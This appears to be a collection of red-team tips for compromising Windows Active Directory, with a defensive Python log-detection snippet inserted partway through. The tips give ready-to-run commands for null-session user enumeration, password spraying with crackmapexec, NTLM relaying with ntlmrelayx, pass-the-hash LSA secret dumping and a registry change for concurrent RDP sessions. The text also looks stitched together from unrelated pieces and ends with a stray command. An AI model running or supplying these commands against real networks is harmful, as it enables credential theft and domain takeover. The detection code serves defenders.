Everything patched? Good baselines? Find NULL Sessions!
1) Find your DC's
nmap -sS -p3268,3269 -iL subnets.txt
2) Enumerate Users
enum4linux -U 192.168.x.x
3) Pull Password Policy
enum4linux -P 192.168.x.x
4) Password Spray Usernames
cme smb 192.168.x.x -u users.txt -p Summer2019
[I'm not following. I'm using Null sessions to extract usernames and password policy. Then crackmapexec to log all those users in at once with the password "Summer2019".]
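The two steps above leave a distinctive trace on the domain controller. As an added example (not part of the original note), the following Python flags both from Windows Security log records: a null session shows up as a successful network logon (4624, logon type 3) by ANONYMOUS LOGON, and a spray shows up as one source failing (4625) against many distinct accounts in a short window. The record layout and the sample events are assumptions constructed for this example.

```python
# Added example, not from the original note: detection for null-session
# enumeration and password spraying over constructed Security-log records.
# Assumed record shape: dicts with EventID, TargetUserName, LogonType,
# IpAddress, TimeCreated (the corresponding fields of events 4624/4625).
from collections import defaultdict
from datetime import datetime, timedelta

ANONYMOUS = "ANONYMOUS LOGON"  # account name Windows records for a null session

def null_session_logons(events):
    """(IpAddress, time) of successful network logons by the anonymous account."""
    return [(e["IpAddress"], e["TimeCreated"]) for e in events
            if e["EventID"] == 4624 and e["LogonType"] == 3
            and e["TargetUserName"].upper() == ANONYMOUS]

def spray_sources(events, min_users=5, window=timedelta(minutes=10)):
    """Map source IP -> distinct accounts with failed logons (4625) inside a
    sliding window, for sources at or above min_users. One password across many
    usernames looks like this; one account being brute-forced does not."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_ip[e["IpAddress"]].append((e["TimeCreated"], e["TargetUserName"]))
    flagged = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1  # slide the window forward
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                flagged[ip] = max(len(users), flagged.get(ip, 0))
    return flagged

# Constructed sample: one null session, then one password tried on 8 accounts
# from the same host, plus a single user mistyping a password (not a spray).
t0 = datetime(2019, 7, 1, 9, 0, 0)
SAMPLE = [
    {"EventID": 4624, "TargetUserName": "ANONYMOUS LOGON", "LogonType": 3,
     "IpAddress": "10.0.0.50", "TimeCreated": t0},
] + [
    {"EventID": 4625, "TargetUserName": f"user{i}", "LogonType": 3,
     "IpAddress": "10.0.0.50", "TimeCreated": t0 + timedelta(seconds=5 * i)}
    for i in range(8)
] + [
    {"EventID": 4625, "TargetUserName": "alice", "LogonType": 2,
     "IpAddress": "10.0.0.77", "TimeCreated": t0 + timedelta(minutes=i)}
    for i in range(3)
]
```

Running `spray_sources(SAMPLE)` returns `{"10.0.0.50": 8}` and leaves 10.0.0.77 unflagged; in production the records would come from the DC's Security log rather than the inline list.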
How I got Domain Admin today. Relay creds > SAM dump > PTH > read cleartext
1) cme smb <CIDR> --gen-relay-list smbrelay.txt
2) ntlmrelayx.py -tf smbrelay.txt
3) Wait for admin hash (500)
4) cme smb <CIDR> -u username -H NTHASH --lsa
5) cat /root/.cme/logs/*.secrets | sort -u
Red Tip #344: Set HKLM\System\CurrentControlSet\Control\Terminal Server /v fSingleSessionPerUser /d 0 to allow multiple sessions per user on a server. This is useful if you want to log in to the jump-host, but that guy's just on all day long...
Get-ComputerInfo